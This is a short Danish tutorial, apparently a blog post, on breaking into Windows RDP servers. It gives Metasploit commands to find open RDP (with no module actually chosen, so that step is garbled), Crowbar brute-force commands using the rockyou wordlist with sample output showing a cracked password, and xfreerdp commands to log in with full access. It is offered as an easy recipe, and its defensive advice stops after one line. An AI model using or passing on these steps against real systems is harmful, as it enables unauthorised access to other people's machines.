Hacking på rdp server.

Hacking rdp er blevet meget nemt.

Du skal bruge en kali samt lidt tools.

 

msf6 > show options

msf6 > Set RHOST 192.168.0.23

RHOST => 192.168.0.23

exploit

Du kan nu se listen over hvilken ip som er åben for rdp.

exit

Du skal også bruge crowbar fra github.

cd git

git clone https://github.com/galkan/crowbar

cd crowbar

./crowbar.py -h

Som jeg viser her bruger vi 192.168.0.23 som attack ip. Protocol er rdp (remote desktop). Bruger navn er brugernavn og den sidste parametre er til password filen som skal bruges. Du vil nu få en liste over hvilken maskiner som det er muligt at tilgå, og du kan til gå den med xfreerdp eksempelvis hvis du er på en Linux maskine.

$ ./crowbar.py --server 192.168.0.23/32  -b rdp -u brugernavn -C /usr/share/wordlists/rockyou.txt
2021-02-10 23:34:50 START
2021-02-10 23:34:50 Crowbar v0.4.3-dev
2021-02-10 23:34:52 Trying 192.168.0.23:3389
2021-02-10 23:34:54 RDP-SUCCESS : 192.168.0.23:3389 - brugernavn:mitkodeord

Hvis du manger password filen kan du installere den som vist her.

$ sudo apt-get install wordlists

 

For at lave remove desktop til maskinen kan du bruge xfreerdp. Den installeres også nemt med en apt install.

$ sudo apt install xfreerdp

For at starte remove desktop op skal du bruge de parametre som du fik at skanningen.

$ sudo xfreerdp /u:brugernavn /p:mitkodeord /v:192.168.0.23

Hvis den ikke er installeret kan du nemt installere den med apt som vist her.

$ sudo apt install freerdp2-x11

$ sudo xfreerdp /u:brugernavn /p:mitkodeord /v:192.168.0.23

Du har nu fuld adgang med remote desktop til maskinen.

 

For at stoppe den slags attack kan du gøre følgende i Windows.

Start programmet Local Security Policy